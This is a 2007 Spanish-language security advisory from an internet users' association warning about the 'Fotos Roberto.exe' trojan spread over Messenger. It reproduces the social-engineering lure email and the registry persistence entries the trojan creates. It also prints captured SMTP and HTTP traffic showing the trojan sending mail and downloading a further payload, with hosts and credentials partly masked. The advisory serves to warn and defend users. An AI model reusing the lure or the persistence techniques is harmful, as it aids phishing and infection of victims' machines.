Comisión de Seguridad

ir a menu
ir a noticias
ir a bloques informativos
Ir a Página sobre accesibilidad
Ir a Página de Inicio
Ir a Página de Texto
Ir a Mapa web
Ir a Buscador
Ir a Aviso Legal
Contactar con la Asociación de Internautas
Comprueba tu velocidad de conexion, ADSL, Cable, RTB

Menu

Noticias

Ayuda a la Asociación de Internautas con tu donación

Falsas fotos

Nuevas modificaciones del virus-troyano Fotos Roberto.exe que llega por Messenger hace estragos.

Advertimos de nuevas variantes del este troyano que usa un llamativo asunto:

- Como estas?, tanto tiempo! -

El virus-troyano se auto-envía a los contactos que tenga el usuario en el Messenger.

08-06-2007 - Si usted recibe el siguiente correo electrónico o similares, tenga mucho cuidado;


From: "xxxxxxx@hotmail.com"
To:
Subject: Como estas?, tanto tiempo!

Y che como estas!! tanto tiempo!! el otro dia hable con Roberto..dice que ta todo bien..me paso unas fotos del y su mujer...me dijo que te pasara, descargalas de aca: http://XXXXXXX/fotos.zip ..tene cuidado a quien
le mostras he! responde o conectate al MSN algun dia q hace tanto tiempo q no nos juntamos todos los gurises!

Nessun dorma


Si se descarga o dependiendo el navegador que use se auto-descarga y se ejecuta sin el consentimiento del usuario, sepa que es un troyano.

El troyano que se ejecuta es; Fotos roberto.exe de 66,5 KB



Al ejecutarse nos modifica el registro y cambia opciones del navegador:

-Registro de Windows:\\HKLM\Software\Microsoft\Windows\CurrentVersion\Run\
Cambiar svchost C:\WINDOWS\addins\svchost.exe
C:\WINDOWS\system\svchost.exe 08/06/2007 12:57:23

-C:\WINDOWS\system32\wbem\wmiprvse.exe
Registro de Windows:\\HKLM\Software\Microsoft\Windows\CurrentVersion\Run\ Agregar Upgrade c:\windows\system32\winupgd.exe

-Internet Explorer:\\IESettings (MIMAQUINA) Cambiar Start Page http://prosXXXXXX.com about:blank


Crea un fichero llamado; mis contactos.txt
Este contiene los contactos de Messenger del usuario infectado, para ser usados en un reenvio.

Manda un correo electrónico y realiza una nueva descarga:




220 smtp-s1.antel.net.uy ESMTP Relay service (7.2.072.1) ready
EHLO MIMAQUINA
250-smtp-s1.antel.net.uy
250-8BITMIME
250-PIPELINING
250-HELP
250-AUTH=LOGIN
250-AUTH LOGIN CRAM-MD5 PLAIN
250-DELIVERBY 300
250 SIZE 30720000
AUTH LOGIN
334 VXNlcm5hbWU6
bWFyY2VkZWXXXXXXXXXXXXXXXXXXmV0LmNvbS51eQ==
334 UGXXXXXQ6


Descarga del nuevo fichero llamado: virus.zip

GET /virus.zip HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: XXXXXX.com
Connection: Keep-Alive

HTTP/1.1 302 Found
Server: Apache/2.0.59 (Unix) PHP/5.2.0
Location: http://XXXXXXX.com/
Content-Length: 219
Connection: close
Content-Type: text/html; charset=iso-8859-1

En realidad este fichero es un ejecutable llamado; virus.exe




En el servidor que contiene el malware se encuentra otros ficheros:





Advertimos que los anti-virus no lo detectan al ser una nueva variante pues tenga mucho cuidado.

Consejos y advertencias:
Si usted recibe un correo de un extraño, un correo no deseado, incluso este tipo de tarjetas les recomendamos la máxima prudencia y si es posible no haga caso de este tipo de correos electrónico y NUNCA pulsar sobre los enlaces que contiene.


Agradecemos a KiKiTo (Pitas Pitas Pitas, por el aviso).


Comisión de Seguridad en la Red.
José María Luque Guerrero
http://seguridad.internautas.org - www.seguridadenlared.org - www.seguridadpymes.es
Asociación de Internautas. www.internautas.org

Volver<<< Volver
ImprimirVersión para imprimir Impresora | Versión PDF PDF
Enviar artículo a un amigo:
Las direcciones de correo no se almacenan en parte alguna, simplemente son utilizadas para el envio del correo al destinatario

Bloques informativos

Virus y Troyanos

Seguridad Pymes

Logos y Marcas propiedad de sus respectivos autores
Se permite la reproducción total o parcial de todos los contenidos siempre que se cite la fuente y se enlace con el original
Logo AI pequeño
© 1998-2015 Asociación de Internautas
Aviso Legal - Contacto
¡Nuestro RSS! | Accesibilidad

¡Internautas Televisión! |¡Alertvir! |¡Seguridad en las PYMES! |¡Comisión de Seguridad! |¡Tienda de la Asociación de Internautas! |¡Seguridad en la Red! |¡Foros públicos de la Asociación de Internautas!